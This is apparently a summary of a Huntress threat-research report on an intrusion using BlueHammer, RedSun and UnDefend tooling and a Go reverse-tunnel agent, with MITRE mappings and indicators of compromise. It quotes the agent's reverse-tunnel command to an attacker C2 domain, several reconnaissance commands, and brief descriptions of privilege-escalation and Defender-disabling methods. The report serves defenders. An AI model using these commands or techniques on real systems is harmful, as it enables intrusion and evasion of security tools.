Threat Research

Nightmare-Eclipse Tooling Seen in Real-World Intrusion

Huntress
Nightmare-Eclipse Tooling Seen in Real-World Intrusion
Huntress investigated a real-world intrusion that deployed Nightmare-Eclipse tooling (BlueHammer, RedSun, UnDefend) alongside a Go-based reverse tunnel agent dubbed BeigeBurrow and linked activity to likely compromised FortiGate SSL VPN credentials. Artifacts were staged in user-writable folders (Pictures, short Downloads subfolders), operators performed hands-on-keyboard reconnaissance but privilege-escalation attempts largely failed; defenders are urged to urgently review VPN logs, endpoint telemetry, and the specific filenames and indicators observed. #BlueHammer #BeigeBurrow

Keypoints

  • Huntress observed in-the-wild use of Nightmare-Eclipse tooling (BlueHammer, RedSun, UnDefend) during a live intrusion investigation.
  • Initial access is tied to likely compromised FortiGate SSL VPN credentials with sessions from multiple geolocated source IPs (including 78.29.48[.]29).
  • Malicious binaries were staged and executed from user-writable locations (Pictures and short Downloads subfolders) with filenames matching public PoC repositories (FunnyApp.exe, RedSun.exe, undef.exe, z.exe).
  • Operators performed hands-on-keyboard reconnaissance (whoami /priv, cmdkey /list, net group) but observed BlueHammer/RedSun did not achieve successful privilege escalation or SAM extraction in this incident.
  • A Go-based yamux reverse-tunnel agent (BeigeBurrow, observed as agent.exe -server staybud.dpdns[.]org:443 -hide) provided follow-on tunneling/proxy capability for the adversary.
  • UnDefend disrupted Defender by locking signature files while running, but its effects are temporary (handles released when the process ends); Huntress recommends urgent hunting and incident response for any confirmed execution.

MITRE Techniques

  • [T1133 ] External Remote Services – Initial access via SSL VPN to a FortiGate firewall: ‘a threat actor initiated an SSL VPN connection to a FortiGate firewall from 78.29.48[.]29’
  • [T1078 ] Valid Accounts – Use of valid user credentials for remote access: ‘using credentials for the victim user account.’
  • [T1068 ] Exploitation for Privilege Escalation – BlueHammer and RedSun were used to attempt escalation to SYSTEM: ‘BlueHammer and RedSun can be used as privilege escalation techniques to take an attacker from an unprivileged account to SYSTEM.’
  • [T1003 ] OS Credential Dumping – BlueHammer targeted the SAM to extract NT hashes: ‘BlueHammer… parses the SAM hive itself, and decrypts each user’s NT hash (password representation).’
  • [T1543.003 ] Create or Modify System Process: Windows Service – RedSun achieves SYSTEM execution by placing TieringEngineService.exe in System32 and invoking a SYSTEM COM engine: ‘RedSun calls the Storage Tiers Management engine COM object… executes C:WindowsSystem32TieringEngineService.exe which is a copy of RedSun.’
  • [T1562.001 ] Impair Defenses: Disable or Modify Tools – UnDefend locks Defender signature files to prevent reload/restart: ‘UnDefend… locks mpavbase.vdm at the active signature location, preventing Defender from reloading its signature base on restart.’
  • [T1059 ] Command and Scripting Interpreter – Operator executed command-line enumeration (typical hands-on-keyboard activity): ‘whoami /priv, cmdkey /list, and net group.’
  • [T1087 ] Account Discovery – Adversary performed account/credential discovery to enumerate privileges and stored credentials: ‘cmdkey /list’ and ‘net group’ usage observed.
  • [T1090 ] Proxy – BeigeBurrow established a multiplexed reverse tunnel to a C2 (yamux) to relay connections: ‘agent.exe -server staybud.dpdns[.]org:443 -hide’

Indicators of Compromise

  • [File paths / Filenames ] Staged and executed from user-writable locations – C:Users[REDACTED]PicturesFunnyApp.exe, C:Users[REDACTED]DownloadsRedSun.exe, and 2 more files (undef.exe, z.exe)
  • [Command line ] Tunneling agent invocation – agent.exe -server staybud.dpdns[.]org:443 -hide
  • [Domain ] C2 / tunneling destination – staybud.dpdns[.]org
  • [IP addresses ] Suspicious FortiGate SSL VPN source IPs – 78.29.48[.]29, 212.232.23[.]69, and 179.43.140[.]214
  • [File hash ] Observed agent binary SHA-256 – a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c
  • [Detection name ] Defender detections tied to observed activity – Exploit:Win32/DfndrPEBluHmr.BZ and EICAR alerts from unknown binaries

Read more: https://www.huntress.com/blog/nightmare-eclipse-intrusion